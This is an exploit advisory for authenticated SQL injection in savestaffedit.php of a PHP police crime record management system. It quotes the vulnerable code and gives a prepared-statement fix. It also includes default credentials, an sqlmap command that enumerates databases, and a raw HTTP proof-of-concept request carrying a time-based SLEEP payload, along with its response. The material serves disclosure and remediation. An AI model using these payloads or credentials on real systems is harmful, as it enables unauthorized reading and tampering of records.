# Date: 17/08/2021
# Exploit Author: Davide 't0rt3ll1n0' Taraschi
# Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: 1.0
# Tested on: Linux (Ubuntu 20.04) using LAMPP
## Impact:
An authenticated user may be able to read data for which they are not
authorized, tamper with or destroy data, or possibly even
read/write files or execute code on the database server.
## Description:
All four parameters passed via POST are vulnerable:
`fname` is vulnerable both to boolean-based blind and time-based blind SQLi
`oname` is vulnerable both to boolean-based blind and time-based blind SQLi
`username` is only vulnerable to time-based blind SQLi
`status` is vulnerable both to boolean-based blind and time-based blind SQLi
## Remediation:
Here is the vulnerable code:
```php
if($status==''){
    mysqli_query($dbcon,"update userlogin set surname='$fname',
    othernames='$oname' where staffid='$staffid'")or
    die(mysqli_error());
}
if(!empty($status)){
    mysqli_query($dbcon,"update userlogin set
    surname='$fname',status='$status', othernames='$oname' where
    staffid='$staffid'")or die(mysqli_error());
}
```
As you can see, the parameters described above are interpolated into the
query string without being checked, which leads to the SQLi.
To patch this vulnerability, I suggest sanitizing those variables
via `mysqli_real_escape_string()` before they are passed to the
query, or, better, binding them as parameters of a prepared statement.
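As an added example (not the vendor's code and not part of the original advisory), here is how the two queries quoted above look when rewritten as prepared statements with bound parameters. With the values bound this way they are sent to MySQL separately from the SQL text, so a payload like the one in the PoC is stored as a literal string and no escaping step is needed. The example assumes `$dbcon` is the script's mysqli connection and that `$staffid` is already set the same way it is in the original `savestaffedit.php` (the advisory does not show where it comes from).

```php
<?php
// Added example, not code from the project or the advisory: a hardened
// replacement for the two mysqli_query() calls quoted in the advisory.
// Assumptions: $dbcon is the application's mysqli connection and
// $fname, $oname, $status, $staffid are the same variables used in
// savestaffedit.php.

function update_staff(mysqli $dbcon, string $staffid, string $fname, string $oname, string $status): bool
{
    if ($status === '') {
        // Same branch as the original: status is left untouched.
        $sql = 'UPDATE userlogin SET surname = ?, othernames = ? WHERE staffid = ?';
        $stmt = $dbcon->prepare($sql);
        if ($stmt === false) {
            error_log('prepare failed: ' . $dbcon->error);
            return false;
        }
        // 's' = string for each placeholder, in the order they appear.
        $stmt->bind_param('sss', $fname, $oname, $staffid);
    } else {
        $sql = 'UPDATE userlogin SET surname = ?, status = ?, othernames = ? WHERE staffid = ?';
        $stmt = $dbcon->prepare($sql);
        if ($stmt === false) {
            error_log('prepare failed: ' . $dbcon->error);
            return false;
        }
        $stmt->bind_param('ssss', $fname, $status, $oname, $staffid);
    }

    $ok = $stmt->execute();
    if (!$ok) {
        // Keep the driver error in the server log instead of echoing it to
        // the client as the original die(mysqli_error()) would.
        error_log('update failed: ' . $stmt->error);
    }
    $stmt->close();
    return $ok;
}

// The same three POST parameters used by the queries quoted in the
// advisory. $staffid is assumed to be set already (see lead-in).
$fname  = $_POST['fname']  ?? '';
$oname  = $_POST['oname']  ?? '';
$status = $_POST['status'] ?? '';

if (!update_staff($dbcon, $staffid, $fname, $oname, $status)) {
    http_response_code(500);
    exit('Could not update staff record.');
}
```

The `?` placeholders are the only thing the database ever sees in the query text; the contents of `$fname` and friends are transmitted as typed values, so the quote in the PoC payload cannot close the string literal and the `SLEEP(5)` is never evaluated. The generic error message returned to the client also stops the page from leaking `mysqli_error()` output, which boolean-based blind techniques often rely on.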
## Exploitation through sqlmap
1) Log into the application (you can try the default creds
1111:admin123)
2) Copy your PHPSESSID cookie
3) Launch the following command:
```shell
sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php \
  --data="fname=&oname=&username=&status=" --batch --dbs \
  --cookie="PHPSESSID=$phpsessid"
```
replacing `$target` with your actual target and `$phpsessid` with the
cookie copied in step 2.
## PoC:
Request:
```http
POST /ghpolice/admin/savestaffedit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ghpolice/admin/user.php
Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=
```
After a 5-second delay we get the response:
```http
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 14:28:59 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.4.22
Content-Length: 1074
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
etc...
```